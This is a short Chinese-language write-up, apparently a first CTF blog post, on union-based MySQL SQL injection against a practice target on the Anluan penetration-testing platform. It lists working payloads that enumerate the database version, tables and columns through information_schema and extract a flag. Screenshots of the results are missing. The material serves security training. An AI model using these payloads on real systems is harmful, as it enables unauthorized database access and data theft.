文章目录
安鸾渗透实战平台|SQL数字型注入详细教程
前言
提示:这里可以添加本文要记录的大概内容:
主要是针对于Mysql 5.0版本即以上的sql注入漏洞的利用
提示:以下是本篇文章正文内容,下面案例可供参考
一、Mysql默认的information库基本
结构
1.schemata表内容
该表记录数据库内全部的库名称,并且不重复。此处重点使用**Schema_name**
2.tables表内容
该表记录数据库内的库民、表名、字段,内容存在重复。此处重点使用**table_name**
3.columns表内容
该表记录数据库库名、表名、字段名,一一对应。此处重点使用Column_name
二、渗透靶场地址
http://47.103.94.191:8034/
三、mysql渗透步骤
1.进入靶场,查看页面基本信息
2.判断是否存在注入
3.判断是否存在 符号过滤
4.判断数据库字段列名数量
结果为:
5.使用联合查询判断显位点
-1' union select 1,2,3 ,4,5,6,7,8,9,10,11,12,13,14 #
结果为:
通过语句判错的方式找到显位点为3,9
6.基本信息收集
**1' union select 1,2,version(),4,5,6,7,8,database(),10,11,12,13,14 #**
结果为:
7.查询指定数据(cms)库下所有的表名
**1' union select 1,2,binary(group_concat(table_name)),4,5,6,7,8,9,10,11,12,13,14 from information_schema.tables where table_schema like 'cms'#**
结果为:
8.查询指定表明下的所有字段名
**1' union select 1,2,binary(group_concat(column_name)),4,5,6,7,8,9,10,11,12,13,14 from information_schema.columns where table_name like 'this_is_flag'#**
结果为:
9.查询具体信息
1' union select 1,2,binary(id),4,5,6,7,8,binary(flag),10,11,12,13,14 from this_is_flag#
结果为:
四、总结
提示:这里对文章进行总结:
第一次写write up,不足之处还请各位大佬批评指出。本次sql注入很轻松完成,最后注意查询具体信息时语句为:
1' union select 1,2,binary(id),4,5,6,7,8,binary(flag),10,11,12,13,14 from this_is_flag#
为什么不是’this_is_flag’而是this_is_flag?值得思考